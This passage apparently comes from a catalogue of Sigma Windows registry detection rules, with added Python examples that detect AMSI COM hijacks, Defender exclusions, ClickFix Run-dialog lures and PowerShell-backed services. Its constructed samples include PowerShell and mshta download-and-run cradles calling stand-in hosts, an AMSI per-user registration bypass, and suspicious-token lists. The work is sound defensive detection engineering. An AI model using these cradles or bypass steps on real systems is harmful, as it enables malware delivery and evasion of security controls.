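EXPECTED_SERVER = "c:\\windows\\system32\\amsi.dll"
_INPROC_RE = re.compile(
    r"\\clsid\\" + re.escape(AMSI_CLSID) + r"\\inprocserver32(\\\(default\))?$",
    re.IGNORECASE,
)


def expand_windir(path):
    """Expand %windir% / %SystemRoot% as found in REG_EXPAND_SZ data (assumes C:\\Windows)."""
    return re.sub(r"%(windir|systemroot)%", lambda _: "C:\\Windows", path, flags=re.IGNORECASE)


def amsi_com_hijack(event):
    """Return a reason string if the event re-points the AMSI COM server, else None."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "")
    if not _INPROC_RE.search(target):
        return None
    server = expand_windir(event.get("Details", "")).strip().strip('"').lower()
    if target.lower().startswith("hku\\"):
        # AMSI is registered machine-wide. A per-user CLSID entry shadows that
        # registration for the user's non-elevated processes, whatever it points
        # at, so any per-user write to this CLSID is a finding.
        return f"per-user AMSI CLSID registration -> {server or '(empty)'}"
    if server != EXPECTED_SERVER:
        return f"AMSI InprocServer32 redirected -> {server or '(empty)'}"
    return None


def scan(events):
    return [finding for finding in map(amsi_com_hijack, events) if finding]


# Constructed sample telemetry with a made-up SID; not real logs.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
INPROC = f"CLSID\\{AMSI_CLSID}\\InprocServer32\\(Default)"
SAMPLE_EVENTS = [
    # The enigma0x3 bypass: per-user registration pointing at a server that does not exist.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": f"HKU\\{SID}_Classes\\{INPROC}",
     "Details": "C:\\Users\\Public\\IDontExist.dll"},
    # Servicing rewriting the machine-wide value to the real DLL: no finding.
    {"EventID": 13, "Image": "C:\\Windows\\servicing\\TrustedInstaller.exe",
     "TargetObject": f"HKLM\\SOFTWARE\\Classes\\{INPROC}",
     "Details": "%windir%\\system32\\amsi.dll"},
    # Machine-wide value redirected to a dropped DLL: fires.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": f"HKLM\\SOFTWARE\\Classes\\{INPROC}",
     "Details": "C:\\ProgramData\\amsi.dll"},
    # Another CLSID entirely: not this rule's concern.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Classes\\CLSID\\{00000000-0000-0000-0000-000000000000}\\InprocServer32\\(Default)",
     "Details": "C:\\Program Files\\Vendor\\vendor.dll"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Because the regex searches rather than anchors at the start, a write under a WOW6432Node Classes key is matched as well; the allowlist comparison is done after expanding the environment variable so that the legitimate REG_EXPAND_SZ form is not itself reported.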
Windows Defender Exclusions Added - Registry
Detects the setting of Windows Defender exclusions via the registry
Internal MISP references
UUID a982fc9c-6333-4ffb-a51d-addb04e8b529 which can be used as unique global reference for Windows Defender Exclusions Added - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-07-06 |
| falsepositive | ['Administrator actions'] |
| filename | registry_set_defender_exclusions.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
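As an added example (not code from the Sigma rule), the Python below extracts the exclusion type and the excluded item from constructed Sysmon Event ID 13 records under the Defender Exclusions keys. The point it demonstrates is a parsing pitfall: the excluded path is the registry value name and itself contains backslashes, so the usual "split on the last backslash" yields only the final path segment. The key marker, the Policies distinction, the Image attribution note and the sample events are assumptions made for this example.

```python
# Marker shared by the live Defender key and the Policies key (assumed; both
# end up as ...\Windows Defender\Exclusions\<Type>\<item>).
EXCLUSION_MARKER = "\\windows defender\\exclusions\\"


def parse_exclusion(target):
    """Split an exclusion TargetObject into (type, item).

    The excluded item is the registry *value name* and may itself contain
    backslashes (...\\Exclusions\\Paths\\C:\\Users\\Public), so an rsplit on
    the last backslash would report only 'Public'. Anchor on the Exclusions
    marker instead and take everything after the type segment."""
    lowered = target.lower()
    start = lowered.find(EXCLUSION_MARKER)
    if start < 0:
        return None
    remainder = target[start + len(EXCLUSION_MARKER):]
    kind, sep, item = remainder.partition("\\")
    if not sep or not item:
        return None
    return kind, item


def defender_exclusion_added(event):
    """Describe a registry_set event that adds a Defender exclusion, or return None."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "")
    parsed = parse_exclusion(target)
    if parsed is None:
        return None
    kind, item = parsed
    return {
        "kind": kind,                                    # Paths, Processes, Extensions, ...
        "item": item,
        "via_policy": "\\policies\\" in target.lower(),  # pushed through the Policies key
        # Exclusions added with Add-MpPreference are written by the Defender
        # service itself, so Image is typically MsMpEng.exe rather than the
        # caller; attribution needs correlation with process creation events.
        "image": event.get("Image", ""),
    }


def scan(events):
    return [hit for hit in map(defender_exclusion_added, events) if hit]


# Constructed sample telemetry; not real logs.
LIVE = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
POLICY = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\"
MSMPENG = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.0-0\\MsMpEng.exe"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": MSMPENG, "TargetObject": LIVE + "Paths\\C:\\Users\\Public",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": MSMPENG, "TargetObject": LIVE + "Extensions\\exe",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": POLICY + "Processes\\C:\\Tools\\agent.exe",
     "Details": "DWORD (0x00000000)"},
    # Another Defender setting: not an exclusion, no finding.
    {"EventID": 13, "Image": MSMPENG,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection",
     "Details": "DWORD (0x00000005)"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['kind']}: {hit['item']} (policy={hit['via_policy']}, image={hit['image']})")
```

The `via_policy` flag separates the rule's "Administrator actions" false positive (exclusions deployed through the Policies key) from a direct write to the live key, which is the form most hands-on-keyboard tooling produces.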
Potential Persistence Via Outlook Home Page
Detects potential persistence activity via the Outlook home page feature. An attacker can set a folder home page to achieve code execution and persistence by editing the WebView registry keys.
Internal MISP references
UUID ddd171b5-2cc6-4975-9e78-f0eccd08cc76 which can be used as unique global reference for Potential Persistence Via Outlook Home Page in MISP communities and other software using the MISP galaxy
External references
- https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change - webarchive
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70 - webarchive
- https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand |
| creation_date | 2021-06-09 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_outlook_homepage.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
ETW Logging Disabled For rpcrt4.dll
Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
Internal MISP references
UUID 90f342e1-1aaa-4e43-b092-39fda57ed11e which can be used as unique global reference for ETW Logging Disabled For rpcrt4.dll in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-12-09 |
| falsepositive | ['Unknown'] |
| filename | registry_set_rpcrt4_etw_tamper.yml |
| level | low |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562'] |
Related clusters
To see the related clusters, click here.
UAC Bypass Using Windows Media Player - Registry
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Internal MISP references
UUID 5f9db380-ea57-4d1e-beab-8a2d33397e93 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | registry_set_uac_bypass_wmp.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Using DebugPath
Detects potential persistence using Appx DebugPath
Internal MISP references
UUID df4dc653-1029-47ba-8231-3c44238cc0ae which can be used as unique global reference for Potential Persistence Using DebugPath in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-07-27 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_appx_debugger.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015'] |
Related clusters
To see the related clusters, click here.
Windows Defender Service Disabled - Registry
Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
Internal MISP references
UUID e1aa95de-610a-427d-b9e7-9b46cfafbe6a which can be used as unique global reference for Windows Defender Service Disabled - Registry in MISP communities and other software using the MISP galaxy
External references
- https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali |
| creation_date | 2022-08-01 |
| falsepositive | ['Administrator actions'] |
| filename | registry_set_disable_windows_defender_service.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
PowerShell Script Execution Policy Enabled
Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
Internal MISP references
UUID 8218c875-90b9-42e2-b60d-0b0069816d10 which can be used as unique global reference for PowerShell Script Execution Policy Enabled in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Thurein Oo |
| creation_date | 2023-10-18 |
| falsepositive | ['Likely'] |
| filename | registry_set_powershell_enablescripts_enabled.yml |
| level | low |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution'] |
UAC Notification Disabled
Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
Internal MISP references
UUID c5f6a85d-b647-40f7-bbad-c10b66bab038 which can be used as unique global reference for UAC Notification Disabled in MISP communities and other software using the MISP galaxy
External references
- https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_disable_notification.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-05-10 |
| falsepositive | ['Unknown'] |
| filename | registry_set_uac_disable_notification.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Add DisallowRun Execution to Registry
Detects the DisallowRun value being set to 1, which enables the Explorer policy that prevents the user from running the programs listed under the DisallowRun key
Internal MISP references
UUID 275641a5-a492-45e2-a817-7c81e9d9d3e9 which can be used as unique global reference for Add DisallowRun Execution to Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disallowrun_execution.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Disable Macro Runtime Scan Scope
Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
Internal MISP references
UUID ab871450-37dc-4a3a-997f-6662aa8ae0f1 which can be used as unique global reference for Disable Macro Runtime Scan Scope in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/ - webarchive
- https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba - webarchive
- https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-25 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disable_macroruntimescanscope.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Potential ClickFix Execution Pattern - Registry
Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. Through these fake CAPTCHA pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, such as one-liners that execute remotely hosted malicious files or scripts.
Internal MISP references
UUID f5fe36cf-f1ec-4c23-903d-09a3110f6bbb which can be used as unique global reference for Potential ClickFix Execution Pattern - Registry in MISP communities and other software using the MISP galaxy
External references
- https://github.com/JohnHammond/recaptcha-phish - webarchive
- https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/ - webarchive
- https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493 - webarchive
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2 - webarchive
- https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724 - webarchive
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/ - webarchive
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution - webarchive
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_potential_clickfix_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-03-25 |
| falsepositive | ['Legitimate applications using RunMRU with HTTP links'] |
| filename | registry_set_potential_clickfix_execution.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204.001'] |
Related clusters
To see the related clusters, click here.
Registry Hide Function from User
Detects registry modifications that hide internal tools or functions from the user (malware such as Agent Tesla and HermeticWiper uses this technique)
Internal MISP references
UUID 5a93eb65-dffa-4543-b761-94aa60098fb6 which can be used as unique global reference for Registry Hide Function from User in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-03-18 |
| falsepositive | ['Legitimate admin script'] |
| filename | registry_set_hide_function_user.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook rules to start applications or run macros
Internal MISP references
UUID 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 which can be used as unique global reference for Outlook EnableUnsafeClientMailRules Setting Enabled - Registry in MISP communities and other software using the MISP galaxy
External references
- https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048 - webarchive
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-08 |
| falsepositive | ['Unknown'] |
| filename | registry_set_office_outlook_enable_unsafe_client_mail_rules.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via TypedPaths
Detects an addition or modification to the 'TypedPaths' key in the user or admin registry hive by a non-standard application, which might indicate a persistence attempt
Internal MISP references
UUID 086ae989-9ca6-4fe7-895a-759c5544f247 which can be used as unique global reference for Potential Persistence Via TypedPaths in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-22 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_persistence_typed_paths.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potentially Suspicious Command Executed Via Run Dialog Box - Registry
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
Internal MISP references
UUID a7df0e9e-91a5-459a-a003-4cde67c2ff5d which can be used as unique global reference for Potentially Suspicious Command Executed Via Run Dialog Box - Registry in MISP communities and other software using the MISP galaxy
External references
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/ - webarchive
- https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf - webarchive
- https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71 - webarchive
- https://www.forensafe.com/blogs/runmrukey.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ahmed Farouk, Nasreddine Bencherchali |
| creation_date | 2024-11-01 |
| falsepositive | ['Unknown'] |
| filename | registry_set_runmru_susp_command_execution.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.

Both RunMRU rules above (the ClickFix link pattern and the suspicious-command pattern) depend on how Explorer stores Run-dialog history: one REG_SZ value per slot letter, each ending in a literal "\1" suffix, plus an "MRUList" value that orders the slots most-recent first. The following Python is an added example, not the SigmaHQ rule code: it parses a RunMRU key the way a forensic analyst would, flags entries carrying URLs or LOLBin/PowerShell tokens, and includes a single-event check equivalent to the ClickFix rule. The RunMRU content and the Sysmon event are constructed; the token list is an assumption of what rarely belongs in a user's Run history, not a list taken from the rules.

```python
"""Parse Explorer RunMRU values and flag Run-dialog entries typical of
ClickFix / fake CAPTCHA lures.

Added example; not the SigmaHQ rule code. Assumed layout: one REG_SZ value
per slot letter, each ending in the literal suffix "\\1" that Explorer
appends, plus an "MRUList" value ordering the slots most-recent first.
"""
import re

RUNMRU_SUFFIX = "\\1"          # literal backslash-one appended by Explorer
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Assumed token list: things that rarely belong in a user's Run-dialog history.
SUSPICIOUS_TOKENS = (
    "powershell", "pwsh", "mshta", "curl ", "certutil", "bitsadmin",
    "rundll32", "regsvr32", "wscript", "cscript", "msiexec", "-enc", "iex ",
    "invoke-expression", "downloadstring", "-w hidden", "-windowstyle hidden",
)


def parse_runmru(values):
    """Return [(slot, command)] in MRU order with the "\\1" suffix stripped."""
    entries = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:                      # MRUList can reference a deleted slot
            continue
        cmd = raw[:-len(RUNMRU_SUFFIX)] if raw.endswith(RUNMRU_SUFFIX) else raw
        entries.append((slot, cmd))
    return entries


def classify(cmd):
    """Return the list of reasons a Run-dialog command looks suspicious."""
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("url")
    low = cmd.lower()
    reasons.extend(tok.strip() for tok in SUSPICIOUS_TOKENS if tok in low)
    return reasons


def hunt(values):
    """Suspicious entries, most recent first: [(slot, command, reasons)]."""
    return [(slot, cmd, reasons) for slot, cmd in parse_runmru(values)
            if (reasons := classify(cmd))]


def is_clickfix_event(event):
    """Single Sysmon registry_set event check equivalent to the ClickFix rule:
    a RunMRU slot (not MRUList itself) whose data carries an http(s) link."""
    target = event["TargetObject"].lower()
    return ("\\explorer\\runmru\\" in target
            and not target.endswith("\\mrulist")
            and URL_RE.search(event["Details"]) is not None)


# Constructed RunMRU content (not a real user's history).
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",         # UNC path; its own backslashes stay intact
    "c": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/verify.ps1')\"\\1",
    "d": "mshta https://example.invalid/captcha.hta\\1",
}

if __name__ == "__main__":
    for slot, cmd, reasons in hunt(SAMPLE_RUNMRU):
        print(f"slot {slot}: {cmd!r} -> {', '.join(reasons)}")
```

The parser keeps the UNC entry in slot "b" clean, which matters because a naive `rstrip("\\1")` would eat trailing backslashes and digits from legitimate paths. The rule-equivalent check excludes the MRUList value itself, since that value only holds slot letters.
<test>
r = hunt(SAMPLE_RUNMRU)
assert [s for s, _, _ in r] == ["d", "c"]
assert r[0][1] == "mshta https://example.invalid/captcha.hta"
assert r[0][2] == ["url", "mshta"]
assert r[1][2] == ["url", "powershell", "iex", "-w hidden"]
assert parse_runmru(SAMPLE_RUNMRU)[-1] == ("a", "notepad")
assert parse_runmru(SAMPLE_RUNMRU)[2] == ("b", "\\\\fileserver\\share")
assert parse_runmru({"MRUList": "za", "a": "calc\\1"}) == [("a", "calc")]
assert classify("calc") == []
assert is_clickfix_event({"TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\d", "Details": SAMPLE_RUNMRU["d"]})
assert not is_clickfix_event({"TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "Details": "dcba"})
assert not is_clickfix_event({"TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "Details": "notepad\\1"})
</test>
PowerShell as a Service in Registry
Detects PowerShell code being written to the registry configuration of a Windows service, i.e. a service whose command line invokes PowerShell.
Internal MISP references
UUID 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d which can be used as unique global reference for PowerShell as a Service in Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | oscd.community, Natalia Shornikova |
| creation_date | 2020-10-06 |
| falsepositive | ['Unknown'] |
| filename | registry_set_powershell_as_service.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002'] |
Related clusters
To see the related clusters, click here.
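When this rule fires, the value that was written is usually a service ImagePath carrying `-EncodedCommand` (or one of its abbreviations such as `-e` or `-enc`), so the first triage step is to decode it. The following Python is an added example, not the SigmaHQ rule code: it checks a Sysmon registry_set event for a PowerShell-backed service and decodes the base64/UTF-16LE payload. It assumes the event targets `HKLM\System\CurrentControlSet\Services\<name>\ImagePath`; the service name, path and script are constructed, and the event is built from plain text with the same encoding an attacker would use.

```python
"""Inspect a service ImagePath written to the registry for PowerShell and
decode an -EncodedCommand payload if one is present.

Added example; not the SigmaHQ rule code. Assumes the event targets
HKLM\\System\\CurrentControlSet\\Services\\<name>\\ImagePath. The sample
service, path and script below are constructed.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the whole family rather than one spelling.
_ENC_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"},
                       key=len, reverse=True)
_ENC_RE = re.compile(r"(?:^|\s)[-/](?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)",
                     re.IGNORECASE)
_SERVICES = "hklm\\system\\currentcontrolset\\services\\"


def encode_command(script):
    """The -EncodedCommand form: base64 over UTF-16LE (no BOM)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line):
    """Return the decoded script, or None when there is no valid encoded command."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:            # covers binascii.Error and UnicodeDecodeError
        return None


def inspect_service_event(event):
    """Return triage details for a service whose ImagePath invokes PowerShell, else None."""
    target = event["TargetObject"]
    low = target.lower()
    if not (low.startswith(_SERVICES) and low.endswith("\\imagepath")):
        return None
    details = event["Details"]
    if "powershell" not in details.lower() and "pwsh" not in details.lower():
        return None
    return {
        "service": target.split("\\")[-2],
        "image_path": details,
        "decoded_command": decode_encoded_command(details),
        # -W Hidden / -WindowStyle Hidden (assumed abbreviations) is a common tell
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", details, re.I)),
    }


# Constructed sample (not real telemetry).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"


def build_sample_event():
    """Sysmon EID 13 style event for a service whose binary is PowerShell."""
    cmd = ("%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
           "-NoP -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT))
    return {"EventType": "SetValue",
            "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\WinUpdSvc\\ImagePath",
            "Details": cmd}


BENIGN_EVENT = {"EventType": "SetValue",
                "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
                "Details": "%SystemRoot%\\System32\\spoolsv.exe"}

if __name__ == "__main__":
    print(inspect_service_event(build_sample_event()))
```

Decoding must use UTF-16LE, not UTF-8; a decode with the wrong encoding yields readable-looking garbage with interleaved NULs, which is the usual sign that the payload was handled incorrectly.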
Usage of Renamed Sysinternals Tools - RegistrySet
Detects non-Sysinternals tools setting the "EulaAccepted" registry value (the "accepteula" key), which is normally set when a Sysinternals tool is executed
Internal MISP references
UUID 8023f872-3f1d-4301-a384-801889917ab4 which can be used as unique global reference for Usage of Renamed Sysinternals Tools - RegistrySet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-24 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_renamed_sysinternals_eula_accepted.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1588.002'] |
Related clusters
To see the related clusters, click here.
IE Change Domain Zone
Detects modification of the Internet Explorer security zone registry entries (ZoneMap), such as adding a domain to the Trusted Sites zone
Internal MISP references
UUID 45e112d0-7759-4c2a-aa36-9f8fb79d3393 which can be used as unique global reference for IE Change Domain Zone in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone - webarchive
- https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-22 |
| falsepositive | ['Administrative scripts'] |
| filename | registry_set_change_security_zones.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137'] |
Related clusters
To see the related clusters, click here.
Tamper With Sophos AV Registry Keys
Detects attempts to tamper with Sophos AV functionality via registry value modification
Internal MISP references
UUID 9f4662ac-17ca-43aa-8f12-5d7b989d0101 which can be used as unique global reference for Tamper With Sophos AV Registry Keys in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-02 |
| falsepositive | ['Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate'] |
| filename | registry_set_sophos_av_tamper.yml |
| level | high |
